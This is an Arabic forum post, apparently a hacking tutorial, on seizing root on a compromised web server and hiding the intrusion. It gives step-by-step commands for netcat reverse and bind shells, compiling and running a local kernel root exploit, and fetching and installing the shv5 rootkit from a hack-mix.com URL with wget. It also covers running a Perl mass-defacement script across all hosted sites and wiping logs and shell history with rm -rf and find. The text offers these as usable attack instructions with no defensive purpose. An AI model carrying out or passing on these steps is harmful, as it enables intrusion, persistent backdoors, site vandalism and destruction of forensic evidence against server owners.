عدد النقاط : 10
############################# الـروت وكل مايتعلـق بووهـ .. ############################# زي ما اننا عآرفين ان صلاحية الروت هي الي تتحكم بالسيرفر كامل بجميع مواقعه والحين نبي نعرف كيف بنحصل على صلاحية الروت .. عشآن نسيطر على السيرفر كآمل .. توجد عدة طرق للحصول على الروت : 1) عن طريق اللوكال روت و هو استغلال لتغرة بكيرنل السيرفر 2) عن طريق استغلالات لتغرات البرامج المركبة على السيرفر 3) عن طريق قراءة بعض الملفات التي يكون فيها باسوورد الرووت ############################# الحصول على الروت عن طريق اللوكال رووت الطــرق :- الأتصآل بالسيرفر عن طريق النت كات الحصول على الروت تثبيت الروت كيت على السيرفر عمل ماس ديفاس مسح الاثآر من السيرفر ############################# مآهو اللوكآل روت .؟ اللوكآل ياطويلين العمر هو برنامج مبرمج لاستغلال ثغره باصدار الكيرنل واللوكالات مبرمجه بلغه السي C فتحتاج إلى ترجمة قبل التشغيل وهذا امر الترجمه بعد رفع اللوكال الى السيرفر عن طريق الشل ثم تنفذ هذا الامر gcc local.c -o local كيف أعرف ان اللوكآل مترجم او غير مترجم ؟ اذا كان امتداده C فهذا غير مترجم .. اما اذا كان غير ذلك فهو مترجم موقع تفيدك في البحث عن اللوكلات milw0rm.com/local.php kernel.org/pub/linux securityfocus.com او عن طريق محركات البحث local root exploit 2.6.9-22 ########### الحين عرفنا كل شي عن اللوكال بقى الحين كيف نحصل على الروت من اللوكال هذا قبل لاترفع اللوكال يجب ان تكون متصل بالسيرفر ثمن نرفع اللوكال على السيرفر في مجلد يحمل التصريح 777 اذا كان غير مترجم نعطية تصريح 777 بالامر chmod777local.c و من ثم نترجمه بالامر gcc local.c -o local ثم نعطي الملف الجديد المترجم تصريح 777 بالامر chmod 777 local و في النهاية نشغله بالامر ./local اذا كان مترجم جاهز نكتفي باعطائه تصريح 777 بالامر chmod777local ثم نشغله بهالامر ./local بعد التشغيل ننفذ هالامر id نشوف صلاحيتنا طلعت روت ثم ننفذ هالامر su للحصول على روت كامل / الأتصآل بالسيرفر عن طريق النت كات هناك طريقتين للاتصال بالسيرفر الاتصال العكسي : انك تتنصت ببورت على جهازك عن طريق النت كات واذا كنت في شبكه لازم تفتح بورت في الراوتر وتسوي اتصال عكسي يعني تخلي السيرفر يتصل بك هذا يسمى اتصال عكسي تابعو مـعـي كيف نتصل بالسيرفر أول شـي ترووح تتنصت على اي بورت تبيه nc -v -l -p port port : البورت الي تبي تتنصت عليه ثمن تروح للشـيل .. بالاسفل بعدين تضغط على أتصال ترجع للنت كات تلقى نفسك متصل بالسيرفر ويمكنك من تطبيق الاوامر .. ########### الاتصال العادي : هو انك تفتح بورت في السيرفر وتتصل به عن طريق النت كات وهذا الاسهل .. لانه مايحتاج فتح بورت في الراوتر اول شي تروح للشـل .. بالاسفل ثمـن تطلع اي بي السيرفر من الدوس ping www.??????.com ?????? : حط الموقع الي رافع عليه الشل او اي موقع على السيرفر ثمـن تروح للنت كات وتكتب الامر nc -v -n ipserverport ipserver : بدله بـ اي بي السيرفر الي طلعته من الدوس port : البورت الي فتحته في السيرفر ثمـن اضغط انتر وروح للشـل واضغط على فتـح ارجع للنت كات تلقى نفسك متصل بالسيرفر ويمكنك من تطبيق الاوامر .. ########### الحصول على الروت طبعاً زي ماقلنا فوق توجد عدة طرق للحصول على الروت : 1) عن طريق اللوكال روت و هو استغلال لتغرة بكيرنل السيرفر 2) عن طريق استغلالات لتغرات البرامج المركبة على السيرفر 3) عن طريق قراءة بعض الملفات التي يكون فيها باسوورد الرووت ###################### 1) عن طريق اللوكال روت و هو استغلال لتغرة بكيرنل السيرفر ###################### اذا بدك تاخذ رووت تـآبـع معـآي شو عـم بسوي << قلب سوري خخخخ لنفترض الحين متصلين بالسيرفر عن طريق النت كات نرفع اللوكال على السيرفر في مجلد يحمل التصريح 777 اذا كان غير مترجم نعطية تصريح 777 بالامر chmod777local.c و من ثم نترجمه بالامر gcc local.c -o local ثم نعطي الملف الجديد المترجم تصريح 777 بالامر chmod 777 local و في النهاية نشغله بالامر ./local اذا كان مترجم جاهز نكتفي باعطائه تصريح 777 بالامر chmod777local ثم نشغله بهالامر ./local بعد التشغيل ننفذ هالامر id نشوف صلاحيتنا طلعت روت ثم ننفذ هالامر su للحصول على روت كامل تثبيت الروت كيت على السيرفر الحين حصلنا على روت الحمدلله ومسيطيرين على السيرفر .. صاحب السيرفر طبعاً بيشوف سيرفره اخترق اكيد بيحذف الشلات بيغلق الثغرات بيحدث الكيرنل يعني مافي امل نرجـع .. بس خلك ذكي من اولها ثبت روت كيت على سيرفر عشان لو مره ثانيه بترجع بصلاحية روت بإذن الله ماهو الروت كيت ؟ الرروت كيت : يفتح منفد بالسيرفر و يضيف يوزر بصلاحيات الرووت لضمان رجوعنا للسيرفر مره اخرى في شرحي هذا بستعمل روت كيت اسمه shv5-rootkit لكي نثبت الروت كيت نفعل الآتي : نسحب الروت كيف على اي مكان بالسيرفر بالامر هذا wgethttp://hack-mix.com/tools/shv5-rootkit.zip انتبه ترا الروت كيت الي سبحناه مضغوط يعني نفك ضغطه بالامر هذا unzip shv5-rootkit.zip بعد فك الضغط بتشوف مجلد اسمه shv5 تدخل عليه بالامر هذا cd shv5 ثمن تشوف المجلد يحتوي على ملفات نعطي الملف هذا setup تصريح 777 طبعا بيكون شكل الامر كذا cmod777 setup الحين بقى التشغيل بالامر هذا ./setup password port اي باسوورد نبغي password نضع رقم البورت اللي نبغى نتصل عليه بعد تركيب الرروت كيت port انتظر شوي لين ينتهي عمل الروت كيت لنفترض الحين ثبتنا الروت كيت ونبي نتصل بالسيرفر بصلاحية الروت يتم ذلك ولكن اغلب الي يستخدمونه برنامج putty : تبي البرنامج حمله من الرابط هذا http://hack-mix.com/tools/putty.rar ثمـن نشغلـه بعدين بتطلعلك شاشه سوداء اكتب اليوزر = root الباسوورد = الي كتبته اثناء تركيب الروت كيت ملاحظه : عند كتابة الباسوورد ما يظهرلك الارقام الي كتبتها .. لاتحسب ان كيبوردك خربان .. زي بعض الناس خخخخخخخخ بعدين اتصل .. عمل ماس ديفاس الماس ديفاس : هو تغيير جميع اندكسات المواقع الي على السيرفر .. حتى لو الاندكس مجلد في مجلد الحين نفترض انك مخترق سيرفر وتبي تغير اندكسات المواقع والسيرفر عليه 100 موقع صعبه انك تدخله موقع موقع وتغير اندكساتهم هذه الاداه تغنيك عن هذا التعب .. يريحك و في وقت قصير وهو سكربت مبرمج بلغه البيرل الحين نشوف كيف نشغله اول شي تسحب الملف لاي مكان بالسيرفر wgethttp://hack-mix.com/tools/mass.zip نفك الضغط unzip mass.zip نشغل الاداه الحين perl mass.pl بيطلعلنا كذا يعلمنا كيف نستخدم الاداه musage : perl mass.pl <path too u're index> mexample : perl mass.pl /tmp/index.html <path too u're index المكان اللي رافعين عليه الاندكـس حقنا الان نسحب الاندكس على السيرفر على مجلد tmp حتى يبقى امر التشغيل سهل علينا بعد دلك نشغل السكريبت بامر التشغيل و ننتظر perl mass.pl /tmp/index.html ملاحظه : كلما زاد عدد المواقع كل ما اخذ وقت تشغيل الاداه ورفع الاندكسـآت واذا تبي تعرف المواقع الي على السيرفر http://whois.webhosting.info/ip ip =هنا اي بي السيرفر مسح الاثآر من السيرفر الحين عقب مارفعت صفحة الاختراق حقتك على المواقع وخلاص تبي تطلع من السيرفر لاتنسى شي مهم انك تمسع ملفات اللوق تبع السيرفر لان اي واحد يدخل السيرفر يتخزن الاي بي حقه في ملفات اللوق تبع السيرفر يعني لو تجاهلتها ماتدري الا بكرا العصر يدقون عليك الباب خخخخخخخخخخخ الحين عليك انك تمسح ملفات اللوق وهذه الاوامر لمسحها كلها ولا يبقى لك اثر في السيرفر بإذن الله rm -rf /tmp/logs rm -rf $HISTFILE rm -rf /root/.ksh_history rm -rf /root/.bash_history rm -rf /root/.ksh_history rm -rf /root/.bash_logout rm -rf /usr/local/apache/logs rm -rf /usr/local/apache/log rm -rf /var/apache/logs rm -rf /var/apache/log rm -rf /var/run/utmp rm -rf /var/logs rm -rf /var/log rm -rf /var/adm rm -rf /etc/wtmp rm -rf /etc/utmp find / -name *.bash_history -exec rm -rf {} \; find / -name *.bash_logout -exec rm -rf {} \; find / -name "log*" -exec rm -rf {} \; find / -name *.log -exec rm -rf {} \; كذا انت مسحت جميع الاثار ################################################# بهذا نكون قد أنهينا هذه الدورة ملاحظة : تم نقل هذه الدورة من أجل الفائدة لأعضاء الشبكه العنكبوتيه ويوجد كتاب لهذه الدورة سوف يتم رفعه لكم إلى اللقاء في دورة أخرى بغذن الله تعالى
مازلت لا أفقهى شي ................ http://www.7ammil.com/data/visitors/...836[1].jpg Mr.AZOZ Email:hk-r@live.com